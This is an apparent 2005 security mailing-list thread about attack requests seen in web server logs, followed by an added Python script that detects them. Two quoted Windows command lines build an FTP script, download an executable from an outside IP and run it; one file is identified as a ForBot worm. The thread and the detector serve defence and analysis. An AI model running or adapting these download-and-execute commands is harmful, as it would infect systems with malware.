[Dshield] Anyone seen wiit.exe?
gboyce at badbelly.com
Mon Aug 29 21:41:39 GMT 2005
I was just hit with a similar type of request:
echo open 220.127.116.11 10051>>o&echo h>>o&echo h>>o&echo get cool.exe>>o&echo bye>>o&ftp -n -s:o&cool.exe&del o&exit
I connected to the ftp server and grabbed cool.exe. Submitting it for
scanning revealed it is Win32.HLLW.ForBot.
Yours might be a different variant, but you should be able to use the same
method to figure out what it is.
On Mon, 29 Aug 2005, bgreenwood wrote:
> Over about the past two weeks or so I have noticed the following being
> base64 encoded in the URI of some incoming requests to my site...
> cmd /k echo open 18.104.22.168 17113 > o&echo user 1 1 >> o &echo get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
> I have seen this activity before but with different filenames being
> called out. I don't recall seeing the wiit.exe or know exactly what it
> is supposed to be doing. Has anyone seen this or know what it is
> supposed to be doing once executed?
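Added example, not part of the original thread: one way to spot requests like the two quoted above in a web access log, by decoding base64-looking runs in each request URI and flagging those that build a script file with echo redirects and pass it to ftp -s:. The log layout, the function names, the 192.0.2.x/198.51.100.x addresses and sample.exe are constructed for illustration, and the code assumes the encoded command may sit anywhere in the URI.

```python
import base64
import binascii
import re
from urllib.parse import unquote

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}")  # long base64-alphabet runs; padding ignored
# Traits from the thread: echo-built script file handed to ftp via -s:<file>.
FTP_SCRIPT = re.compile(r"ftp\s+(?:-\w+\s+)*-s:\S+", re.I)
ECHO_REDIRECT = re.compile(r"echo\s+[^&|]*>>?\s*\S+", re.I)
EXE_NAME = re.compile(r"\b([\w.-]+\.exe)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_candidates(uri):
    """Yield printable text decoded from base64-looking runs in a URI."""
    for run in B64_RUN.findall(unquote(uri)):
        padded = run + "=" * (-len(run) % 4)   # restore padding we did not match
        try:
            text = base64.b64decode(padded, validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue
        if all(32 <= ord(c) < 127 for c in text):
            yield text

def inspect_uri(uri):
    """Return details if a decoded run looks like the echo/ftp dropper."""
    for text in decode_candidates(uri):
        if FTP_SCRIPT.search(text) and ECHO_REDIRECT.search(text):
            exes = sorted({m.lower() for m in EXE_NAME.findall(text)})
            return {"decoded": text, "executables": exes}
    return None

def scan_log(lines):
    """Return (line_number, finding) for each flagged access-log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hit = inspect_uri(m.group(1)) if m else None
        if hit:
            hits.append((n, hit))
    return hits

# Constructed sample data: documentation addresses, placeholder file name.
CMD = ("cmd /k echo open 192.0.2.10 2121 > o&echo user 1 1 >> o &echo get "
       "sample.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &sample.exe")
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Aug/2005:21:40:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '198.51.100.9 - - [29/Aug/2005:21:40:05 +0000] "GET /page?d=%s HTTP/1.0" 404 0'
    % base64.b64encode(CMD.encode()).decode(),
]
```

A run that directly follows path characters with no separator decodes misaligned and is missed here; a fuller scanner would retry each run at all four starting offsets.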